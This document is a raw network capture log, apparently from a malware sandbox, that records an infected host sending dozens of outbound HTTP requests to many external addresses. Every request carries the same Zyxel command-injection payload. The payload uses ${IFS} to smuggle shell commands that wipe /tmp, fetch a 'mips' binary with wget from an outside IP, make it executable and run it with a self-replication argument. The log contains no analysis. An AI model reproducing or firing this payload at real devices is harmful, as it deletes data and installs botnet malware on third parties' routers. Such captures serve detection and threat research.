                                        Mar 31, 2024 09:21:08.754298925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3874192.168.2.2338956221.217.235.5443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754338980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3875192.168.2.2334682111.123.217.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754426003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3876192.168.2.2351008209.198.197.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754508018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3877192.168.2.2333340193.136.157.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754580975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3878192.168.2.235382212.8.248.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754638910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3879192.168.2.2336874185.76.133.71443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754729033 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3880192.168.2.2344188193.125.178.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754782915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3881192.168.2.2359032105.113.18.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754858971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3882192.168.2.2351724152.135.58.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754895926 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3883192.168.2.2332916200.118.239.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.754968882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3884192.168.2.235631452.73.30.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755042076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3885192.168.2.234124093.154.14.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755131006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3886192.168.2.234785645.242.140.34443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755193949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3887192.168.2.2348964102.238.19.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755263090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3888192.168.2.2344236181.160.89.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755346060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3889192.168.2.2342024108.101.54.88443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755388021 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3890192.168.2.2338624125.211.86.212443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755451918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3891192.168.2.235542681.124.164.193443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755538940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3892192.168.2.23331108.162.199.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755589962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3893192.168.2.234557613.49.24.255443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755661964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3894192.168.2.2342778157.194.253.140443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755717039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3895192.168.2.2359786223.121.120.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755799055 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3896192.168.2.2354070116.80.239.89443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755846024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3897192.168.2.235170251.120.113.16443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755909920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3898192.168.2.235765644.156.81.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.755992889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3899192.168.2.2356156135.99.139.96443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756072998 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3900192.168.2.2359418197.55.184.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756122112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3901192.168.2.2340680117.120.152.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756192923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3902192.168.2.235955874.88.60.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756272078 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3903192.168.2.233884853.161.74.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756308079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3904192.168.2.2345170203.23.13.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756376982 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3905192.168.2.2345386206.90.168.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756438971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3906192.168.2.2352524154.178.37.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756525993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3907192.168.2.2337284149.52.51.15443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756568909 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3908192.168.2.235088449.65.182.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756640911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3909192.168.2.235021847.88.73.59443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756716967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3910192.168.2.2335698145.30.165.73443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756803036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3911192.168.2.2333894195.43.182.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756844997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3912192.168.2.235391051.109.150.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756942034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3913192.168.2.2342880212.251.105.223443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.756980896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3914192.168.2.2358810187.77.133.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757060051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3915192.168.2.233687641.227.207.56443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757127047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3916192.168.2.2350856187.4.72.135443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757199049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3917192.168.2.2337810111.107.130.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757246971 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3918192.168.2.2333932163.239.214.1443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757314920 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3919192.168.2.2351894200.65.155.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757388115 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3920192.168.2.2353448121.232.17.12443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757457972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3921192.168.2.2359308204.53.199.93443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757536888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3922192.168.2.233710688.31.161.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757586956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3923192.168.2.23607609.165.22.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757641077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3924192.168.2.2352508162.111.164.105443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757729053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3925192.168.2.233795872.211.69.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757786989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3926192.168.2.233944457.134.150.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757836103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3927192.168.2.2354318100.149.176.157443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757915974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3928192.168.2.2353542177.219.224.106443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.757977009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3929192.168.2.234183296.174.152.102443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758071899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3930192.168.2.2345638109.161.227.227443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758136034 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3931192.168.2.2338204147.35.234.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758223057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3932192.168.2.233843039.147.45.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758292913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3933192.168.2.234990278.183.51.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758342028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3934192.168.2.2344766111.34.203.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758400917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3935192.168.2.2358868157.34.161.186443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758447886 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3936192.168.2.233829861.59.78.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758543015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3937192.168.2.2333746206.166.67.9443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758601904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3938192.168.2.233393620.168.198.151443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758661032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3939192.168.2.234335089.1.249.183443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758744001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3940192.168.2.2337106212.89.192.133443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:08.758816957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3941192.168.2.235051634.217.199.115443
                                        TimestampBytes transferredDirectionData
